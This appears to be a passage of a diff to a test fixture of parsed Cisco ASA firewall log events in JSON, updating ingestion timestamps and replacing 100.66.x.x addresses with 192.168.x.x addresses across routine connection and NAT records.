"event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164245900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256", + "ingested": "2021-12-09T13:33:41.994733500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -93,8 +93,8 @@ }, "source": { "port": 80, - "address": "100.66.205.104", - "ip": "100.66.205.104" + "address": "192.168.205.104", + "ip": "192.168.205.104" }, "tags": [ "preserve_original_event" @@ -129,7 +129,7 @@ "localhost" ], "ip": [ - "100.66.205.104", + "192.168.205.104", "172.31.98.44" ] }, @@ -138,8 +138,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164263500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", + "ingested": "2021-12-09T13:33:41.994738Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -155,7 +155,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.104", + "mapped_source_ip": "192.168.205.104", "connection_id": "11757", "source_interface": "outside", "mapped_destination_port": 1772 @@ -177,8 +177,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -213,7 +213,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -224,8 +224,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164271800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994741800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -262,8 +262,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -298,7 +298,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -309,8 +309,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164280100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994748300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -347,8 +347,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" @@ -383,7 +383,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -394,8 +394,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164288300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994753400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -432,8 +432,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" @@ -468,7 +468,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -479,8 +479,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164296300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994758800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -517,8 +517,8 @@ }, "source": { "port": 80, - "address": "100.66.160.197", - "ip": "100.66.160.197" + "address": "192.168.160.197", + "ip": "192.168.160.197" }, "tags": [ "preserve_original_event" @@ -553,7 +553,7 @@ "localhost" ], "ip": [ - "100.66.160.197", + "192.168.160.197", "172.31.98.44" ] }, @@ -564,8 +564,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164304500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994765Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -602,8 +602,8 @@ }, "source": { "port": 80, - "address": "100.66.205.14", - "ip": "100.66.205.14" + "address": "192.168.205.14", + "ip": "192.168.205.14" }, "tags": [ "preserve_original_event" @@ -638,7 +638,7 @@ "localhost" ], "ip": [ - "100.66.205.14", + "192.168.205.14", "172.31.98.44" ] }, @@ -649,8 +649,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164313Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994771300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -687,8 +687,8 @@ }, "source": { "port": 80, - "address": "100.66.124.33", - "ip": "100.66.124.33" + "address": "192.168.124.33", + "ip": "192.168.124.33" }, "tags": [ "preserve_original_event" @@ -723,7 +723,7 @@ "localhost" ], "ip": [ - "100.66.124.33", + "192.168.124.33", "172.31.98.44" ] }, @@ -734,8 +734,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164320900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994779800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -772,8 +772,8 @@ }, "source": { "port": 80, - "address": "100.66.35.9", - "ip": "100.66.35.9" + "address": "192.168.35.9", + "ip": "192.168.35.9" }, "tags": [ "preserve_original_event" @@ -808,7 +808,7 @@ "localhost" ], "ip": [ - "100.66.35.9", + "192.168.35.9", "172.31.98.44" ] }, @@ -819,8 +819,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164329500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994786200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -857,8 +857,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -893,7 +893,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -904,8 +904,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164337500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994792400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -942,8 +942,8 @@ }, "source": { "port": 80, - "address": "100.66.218.21", - "ip": "100.66.218.21" + "address": "192.168.218.21", + "ip": "192.168.218.21" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ "localhost" ], "ip": [ - "100.66.218.21", + "192.168.218.21", "172.31.98.44" ] }, @@ -989,8 +989,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164346900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994798900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1027,8 +1027,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" @@ -1063,7 +1063,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1074,8 +1074,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164355500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994805300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1112,8 +1112,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" @@ -1148,7 +1148,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1159,8 +1159,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164363500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994811600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1197,8 +1197,8 @@ }, "source": { "port": 80, - "address": "100.66.202.211", - "ip": "100.66.202.211" + "address": "192.168.202.211", + "ip": "192.168.202.211" }, "tags": [ "preserve_original_event" @@ -1233,7 +1233,7 @@ "localhost" ], "ip": [ - "100.66.202.211", + "192.168.202.211", "172.31.98.44" ] }, @@ -1244,8 +1244,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164373200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994817800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1282,8 +1282,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" @@ -1318,7 +1318,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1329,8 +1329,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164381200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994823900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -1367,8 +1367,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" @@ -1403,7 +1403,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1414,8 +1414,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164389400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994830300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1452,8 +1452,8 @@ }, "source": { "port": 80, - "address": "100.66.209.247", - "ip": "100.66.209.247" + "address": "192.168.209.247", + "ip": "192.168.209.247" }, "tags": [ "preserve_original_event" @@ -1488,7 +1488,7 @@ "localhost" ], "ip": [ - "100.66.209.247", + "192.168.209.247", "172.31.98.44" ] }, @@ -1499,8 +1499,8 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164397800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.994836700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:45.000Z", @@ -1537,8 +1537,8 @@ }, "source": { "port": 80, - "address": "100.66.35.162", - "ip": "100.66.35.162" + "address": "192.168.35.162", + "ip": "192.168.35.162" }, "tags": [ "preserve_original_event" @@ -1573,7 +1573,7 @@ "localhost" ], "ip": [ - "100.66.35.162", + "192.168.35.162", "172.31.98.44" ] }, @@ -1584,8 +1584,8 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-10-06T20:55:00.164421200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", + "ingested": "2021-12-09T13:33:41.994843Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:26.000Z", @@ -1617,8 +1617,8 @@ }, "destination": { "port": 1188, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -1658,7 +1658,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -1666,8 +1666,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164429300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188", + "ingested": "2021-12-09T13:33:41.994848500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1700,8 +1700,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1736,7 +1736,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, @@ -1745,8 +1745,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164437300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994853800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1762,7 +1762,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.80.32", + "mapped_source_ip": "192.168.80.32", "connection_id": "11758", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1784,8 +1784,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1820,7 +1820,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, @@ -1830,8 +1830,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164445500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", + "ingested": "2021-12-09T13:33:41.994860Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -1868,8 +1868,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1904,7 +1904,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, @@ -1913,8 +1913,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164454Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994866400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1930,7 +1930,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.6", + "mapped_source_ip": "192.168.252.6", "connection_id": "11759", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1952,8 +1952,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1988,7 +1988,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, @@ -1998,8 +1998,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164462500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", + "ingested": "2021-12-09T13:33:41.994871Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2031,8 +2031,8 @@ }, "destination": { "port": 8257, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1773, @@ -2072,7 +2072,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2080,8 +2080,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164470500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257", + "ingested": "2021-12-09T13:33:41.994876100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2114,8 +2114,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" @@ -2150,7 +2150,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, @@ -2159,8 +2159,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164478400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", + "ingested": "2021-12-09T13:33:41.994882400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2176,7 +2176,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11760", "source_interface": "outside", "mapped_destination_port": 1773 @@ -2193,8 +2193,8 @@ }, "destination": { "port": 8258, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1774, @@ -2234,7 +2234,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2242,8 +2242,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164486400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258", + "ingested": "2021-12-09T13:33:41.994887500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2276,8 +2276,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" @@ -2312,7 +2312,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, @@ -2321,8 +2321,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164494200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", + "ingested": "2021-12-09T13:33:41.994892800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2338,7 +2338,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11761", "source_interface": "outside", "mapped_destination_port": 1774 @@ -2360,8 +2360,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2396,7 +2396,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, @@ -2405,8 +2405,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164502400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.994897200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2422,7 +2422,7 @@ "destination_interface": "inside", "mapped_source_port": 53, 